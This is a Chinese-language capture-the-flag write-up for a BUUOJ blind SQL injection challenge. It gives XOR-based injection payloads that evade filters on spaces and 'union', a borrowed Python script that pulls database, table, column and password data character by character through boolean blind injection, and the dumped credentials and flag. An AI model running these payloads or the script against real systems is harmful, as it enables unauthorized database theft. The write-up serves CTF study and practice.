说了是sql注入
看到页面首先会注入用户名和密码,但是一些字符和关键词如:' union都被过滤了
对那些数字入手看看
要第六个,可以对id入手
过滤了union ,空格,再加上id不能随意输入,随意返回,所以应该是盲注
而这里也同样过滤了很多,用布尔盲注,时间盲注都会被过滤
用异或注入试试(难度挺高的)
先尝试
?id=1^0
?id=1^(ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),1,1))=105)^1
可以参照布尔盲注,差不多
可以做了,但是limit被过滤了,还不知道怎么办,下面的脚本好像也没看到代替limit的
别人的脚本(我现在还不会写)
import requests
import time
# url是随时更新的,具体的以做题时候的为准
url = 'http://8d08c7b6-e6f3-4df0-b71c-a2a397891bab.node3.buuoj.cn/search.php?id='
i = 0
flag = ''
while True:
i += 1
# 从可打印字符开始
begin = 32
end = 126
tmp = (begin + end) // 2
while begin < end:
print(begin, tmp, end)
time.sleep(0.1)
# 爆数据库
# payload = "''or(ascii(substr(database(),%d,1))>%d)" % (i, tmp)
# 爆表
# payload = "''or(ascii(substr((select(GROUP_CONCAT(TABLE_NAME))from(information_schema.tables)where(TABLE_SCHEMA=database())),%d,1))>%d)" % (i, tmp)
# 爆字段
# payload = "''or(ascii(substr((select(GROUP_CONCAT(COLUMN_NAME))from(information_schema.COLUMNS)where(TABLE_NAME='F1naI1y')),%d,1))>%d)" % (i, tmp)
# 爆flag 要跑很久
# payload = "''or(ascii(substr((select(group_concat(password))from(F1naI1y)),%d,1))>%d)" % (i, tmp)
# 爆flag 很快
payload = "''or(ascii(substr((select(password)from(F1naI1y)where(username='flag')),%d,1))>%d)" % (i, tmp)
# 错误示例
# payload = "''or(ascii(substr((select(GROUP_CONCAT(fl4gawsl))from(Flaaaaag)),%d,1))>%d)" % (i, tmp)
r = requests.get(url+payload)
if 'Click' in r.text:
begin = tmp + 1
tmp = (begin + end) // 2
else:
end = tmp
tmp = (begin + end) // 2
flag += chr(tmp)
print(flag)
if begin == 32:
break
注入结果
用户:root@localhost
数据库名:Click
表名:F1naI1y
字段名:id,username,password
username:mygod,welcome,site,site,site,site,Syc,finally,flag
password:cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_grilfriend,flag{7c62a615-ec40-44c3-9253-516366f3a908}
表名:Flaaaaag
字段名:id,fl4gawsl